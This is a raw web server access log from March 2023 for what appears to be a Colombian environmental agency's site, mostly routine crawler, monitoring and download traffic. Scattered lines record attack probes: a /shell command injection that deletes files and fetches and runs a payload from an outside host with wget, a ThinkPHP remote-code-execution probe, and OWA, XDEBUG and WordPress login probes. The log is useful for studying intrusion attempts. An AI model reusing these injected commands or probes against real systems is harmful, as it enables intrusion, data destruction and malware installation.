192.168.175.240 - - [18/Mar/2023:01:35:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:34:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:36:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:35:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [18/Mar/2023:01:37:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:38:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:01:38:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:38:45 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.43 - - [18/Mar/2023:01:39:02 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
192.168.175.240 - - [18/Mar/2023:01:39:45 -0500] "GET / HTTP/1.1" 200 4720
74.125.210.166 - - [18/Mar/2023:01:39:47 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
192.168.175.240 - - [18/Mar/2023:01:40:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:40:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41436
201.245.192.253 - - [18/Mar/2023:01:40:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43337
192.168.175.240 - - [18/Mar/2023:01:41:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:40:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Mar/2023:01:41:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [18/Mar/2023:01:42:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:43:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:01:43:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:43:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:44:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:45:45 -0500] "GET / HTTP/1.1" 200 4720
186.251.228.44 - - [18/Mar/2023:01:46:14 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [18/Mar/2023:01:46:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:46:56 -0500] "GET / HTTP/1.1" 200 319
52.167.144.160 - - [18/Mar/2023:01:47:32 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12490
172.22.2.4 - - [18/Mar/2023:01:46:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [18/Mar/2023:01:46:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:47:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:48:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
31.13.103.5 - - [18/Mar/2023:01:48:16 -0500] "GET /chulo-o-gallinazo-un-carronero-que-cumple-un-papel-fundamental-en-los-ecosistemas.html HTTP/1.1" 206 784
172.22.2.4 - - [18/Mar/2023:01:46:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
216.245.221.92 - - [18/Mar/2023:01:48:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:48:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:49:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:50:09 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [18/Mar/2023:01:50:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [18/Mar/2023:01:50:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.36 - - [18/Mar/2023:01:50:53 -0500] "-" 408 -
52.167.144.160 - - [18/Mar/2023:01:51:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
192.168.175.240 - - [18/Mar/2023:01:51:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:52:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.182 - - [18/Mar/2023:01:52:50 -0500] "-" 408 -
162.55.166.12 - - [18/Mar/2023:01:52:56 -0500] "GET / HTTP/1.1" 200 4720
162.55.166.12 - - [18/Mar/2023:01:52:58 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [18/Mar/2023:01:53:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:01:53:08 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [18/Mar/2023:01:51:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.56 - - [18/Mar/2023:01:53:35 -0500] "GET /calculadora/ HTTP/1.1" 304 -
64.124.8.56 - - [18/Mar/2023:01:53:39 -0500] "-" 408 -
216.245.221.92 - - [18/Mar/2023:01:53:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:53:45 -0500] "GET / HTTP/1.1" 200 4720
199.16.157.183 - - [18/Mar/2023:01:53:56 -0500] "-" 408 -
172.22.2.4 - - [18/Mar/2023:01:54:00 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [18/Mar/2023:01:52:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
172.22.2.4 - - [18/Mar/2023:01:54:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [18/Mar/2023:01:54:45 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.103 - - [18/Mar/2023:01:55:08 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [18/Mar/2023:01:55:09 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
192.168.175.240 - - [18/Mar/2023:01:55:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.36 - - [18/Mar/2023:01:56:35 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
192.168.175.240 - - [18/Mar/2023:01:56:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:01:57:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:01:58:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:01:58:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:58:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:01:57:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:01:59:45 -0500] "GET / HTTP/1.1" 200 4720
94.195.114.228 - - [18/Mar/2023:01:59:49 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [18/Mar/2023:01:58:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
66.249.70.180 - - [18/Mar/2023:02:00:43 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:02:00:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:01:20 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
192.168.175.240 - - [18/Mar/2023:02:01:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:02:15 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [18/Mar/2023:02:02:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:03:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:02:03:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:03:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:04:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:03:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:05:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:04:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
157.55.39.225 - - [18/Mar/2023:02:06:17 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:02:06:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:07:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:08:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:02:08:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:08:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.115 - - [18/Mar/2023:02:09:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2548.pdf HTTP/1.1" 200 5126770
192.168.175.240 - - [18/Mar/2023:02:09:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:10:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:09:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:11:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:10:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
192.168.175.240 - - [18/Mar/2023:02:12:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:12:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:02:13:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:13:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:14:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:15:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:16:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:15:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Mar/2023:02:16:07 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 28619
172.22.2.4 - - [18/Mar/2023:02:15:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48649
172.22.2.4 - - [18/Mar/2023:02:16:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44055
192.168.175.240 - - [18/Mar/2023:02:17:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:16:44 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [18/Mar/2023:02:17:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
66.249.79.111 - - [18/Mar/2023:02:18:05 -0500] "GET /Publicaciones/2022EE44284.pdf HTTP/1.1" 404 227
216.245.221.92 - - [18/Mar/2023:02:18:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:18:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:17:29 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 58653
172.22.2.4 - - [18/Mar/2023:02:19:30 -0500] "GET /BLA/boletinlegal/WuEL HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:19:39 -0500] "GET /BLA/boletinlegal/a HTTP/1.1" 404 1018
192.168.175.240 - - [18/Mar/2023:02:19:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:19:49 -0500] "GET /BLA/boletinlegal/download/file.ext HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:19:54 -0500] "GET /BLA/boletinlegal/SiteLoader HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:19:57 -0500] "GET /BLA/boletinlegal/mPlayer HTTP/1.1" 404 1018
192.168.175.240 - - [18/Mar/2023:02:20:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:20:45 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [18/Mar/2023:02:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41606
201.245.192.253 - - [18/Mar/2023:02:20:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43483
64.124.8.49 - - [18/Mar/2023:02:20:53 -0500] "GET /galeria/galeria/fotos/Humedal-techo3P.jpg HTTP/1.1" 304 -
64.124.8.49 - - [18/Mar/2023:02:20:56 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 304 -
64.124.8.49 - - [18/Mar/2023:02:20:56 -0500] "GET /galeria/galeria/fotos/mirador1P.jpg HTTP/1.1" 304 -
64.124.8.49 - - [18/Mar/2023:02:20:56 -0500] "GET /galeria/galeria/fotos/juan-amarillo2P.jpg HTTP/1.1" 304 -
64.124.8.49 - - [18/Mar/2023:02:21:21 -0500] "GET /galeria/galeria/fotos/MeandrodelSay1G.jpg HTTP/1.1" 304 -
192.168.175.240 - - [18/Mar/2023:02:21:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:21:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:22:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:22:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:02:21:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [18/Mar/2023:02:23:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:23:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:24:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:25:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:26:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:27:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:27:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:02:26:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Mar/2023:02:28:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:28:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:27:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [18/Mar/2023:02:29:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:30:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41606
201.245.192.253 - - [18/Mar/2023:02:30:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43483
172.22.2.4 - - [18/Mar/2023:02:31:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
66.249.79.115 - - [18/Mar/2023:02:31:45 -0500] "GET /Publicaciones/2022EE39645.pdf HTTP/1.1" 404 227
192.168.175.240 - - [18/Mar/2023:02:31:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.115 - - [18/Mar/2023:02:32:16 -0500] "GET /Publicaciones/2022EE45828.pdf HTTP/1.1" 404 227
192.168.175.240 - - [18/Mar/2023:02:32:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:32:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:02:33:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:33:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:32:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:34:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:33:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [18/Mar/2023:02:35:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:36:12 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C%20401%20de%202010.doc HTTP/1.1" 304 -
192.168.175.240 - - [18/Mar/2023:02:36:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:37:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:37:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
34.91.41.0 - - [18/Mar/2023:02:37:56 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
52.167.144.149 - - [18/Mar/2023:02:38:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4704.pdf HTTP/1.1" 304 -
216.245.221.92 - - [18/Mar/2023:02:38:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:38:45 -0500] "GET / HTTP/1.1" 200 4720
34.147.107.162 - - [18/Mar/2023:02:39:12 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [18/Mar/2023:02:39:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [18/Mar/2023:02:39:59 -0500] "GET /Publicaciones/2022EE42170.pdf HTTP/1.1" 404 227
172.22.2.4 - - [18/Mar/2023:02:38:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:40:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:40:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41606
201.245.192.253 - - [18/Mar/2023:02:40:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43483
172.22.2.4 - - [18/Mar/2023:02:39:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
192.168.175.240 - - [18/Mar/2023:02:41:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:42:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:42:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:02:43:12 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:43:12 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:43:12 -0500] "GET /BLA/boletinlegal/Res/login.html HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:43:12 -0500] "GET /BLA/boletinlegal/aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:43:12 -0500] "GET /BLA/boletinlegal/99vt HTTP/1.1" 404 1018
172.22.2.4 - - [18/Mar/2023:02:43:12 -0500] "GET /BLA/boletinlegal/99vu HTTP/1.1" 404 1018
216.245.221.92 - - [18/Mar/2023:02:43:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:43:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:43:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
14.29.231.137 - - [18/Mar/2023:02:43:47 -0500] "GET / HTTP/1.1" 200 319
64.124.8.36 - - [18/Mar/2023:02:44:23 -0500] "-" 408 -
192.168.175.240 - - [18/Mar/2023:02:44:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:45:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:44:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:46:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:45:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [18/Mar/2023:02:47:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:47:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:02:48:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:48:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:49:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:50:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:51:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:02:50:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.39 - - [18/Mar/2023:02:51:50 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 93768
172.22.2.4 - - [18/Mar/2023:02:51:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [18/Mar/2023:02:52:43 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-1007-2011-1.doc HTTP/1.1" 304 -
192.168.175.240 - - [18/Mar/2023:02:52:45 -0500] "GET / HTTP/1.1" 200 4720
192.241.236.44 - - [18/Mar/2023:02:52:51 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [18/Mar/2023:02:52:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
66.249.79.113 - - [18/Mar/2023:02:53:14 -0500] "GET /Publicaciones/2022EE39967.pdf HTTP/1.1" 404 227
216.245.221.92 - - [18/Mar/2023:02:53:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:53:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.113 - - [18/Mar/2023:02:54:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2548.pdf HTTP/1.1" 200 5126770
192.168.175.240 - - [18/Mar/2023:02:54:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:55:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:56:45 -0500] "GET / HTTP/1.1" 200 4720
116.202.35.124 - - [18/Mar/2023:02:56:56 -0500] "-" 408 -
172.22.2.4 - - [18/Mar/2023:02:56:21 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 28619
172.22.2.4 - - [18/Mar/2023:02:56:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:57:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:02:57:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
66.249.79.111 - - [18/Mar/2023:02:58:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5769.pdf HTTP/1.1" 200 106229
172.22.2.4 - - [18/Mar/2023:02:56:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
216.245.221.92 - - [18/Mar/2023:02:58:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:02:58:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:02:59:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [18/Mar/2023:03:00:22 -0500] "GET /Publicaciones/2022EE46585.pdf HTTP/1.1" 404 227
66.249.79.113 - - [18/Mar/2023:03:00:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0628.pdf HTTP/1.1" 200 374789
192.168.175.240 - - [18/Mar/2023:03:00:45 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.56 - - [18/Mar/2023:03:01:06 -0500] "GET /pdc/ HTTP/1.1" 200 9830
162.55.175.142 - - [18/Mar/2023:03:01:39 -0500] "GET / HTTP/1.1" 200 319
162.55.175.142 - - [18/Mar/2023:03:01:39 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:01:45 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.216 - - [18/Mar/2023:03:02:22 -0500] "GET /dia-mundial-de-los-humedales-mas-de-60-aves-alzaron-vuelo-en-el-humedal-el-tunjo.html HTTP/1.1" 304 -
192.168.175.240 - - [18/Mar/2023:03:02:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:02:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [18/Mar/2023:03:01:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Mar/2023:03:03:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:03:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:02:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
192.168.175.240 - - [18/Mar/2023:03:04:45 -0500] "GET / HTTP/1.1" 200 4720
181.56.92.33 - - [18/Mar/2023:03:05:16 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
181.56.92.33 - - [18/Mar/2023:03:05:16 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
66.249.79.111 - - [18/Mar/2023:03:05:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0490.pdf HTTP/1.1" 200 114752
192.168.175.240 - - [18/Mar/2023:03:05:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:06:45 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [18/Mar/2023:03:07:45 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [18/Mar/2023:03:07:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
216.245.221.92 - - [18/Mar/2023:03:08:42 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:08:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:07:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [18/Mar/2023:03:09:45 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [18/Mar/2023:03:08:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
66.249.79.113 - - [18/Mar/2023:03:10:34 -0500] "GET /Publicaciones/2022EE42211.pdf HTTP/1.1" 404 227
192.168.175.240 - - [18/Mar/2023:03:10:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.115 - - [18/Mar/2023:03:11:18 -0500] "GET /Publicaciones/2022EE46947.pdf HTTP/1.1" 404 227
192.168.175.240 - - [18/Mar/2023:03:11:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [18/Mar/2023:03:11:54 -0500] "GET /Publicaciones/2022EE45429.pdf HTTP/1.1" 404 227
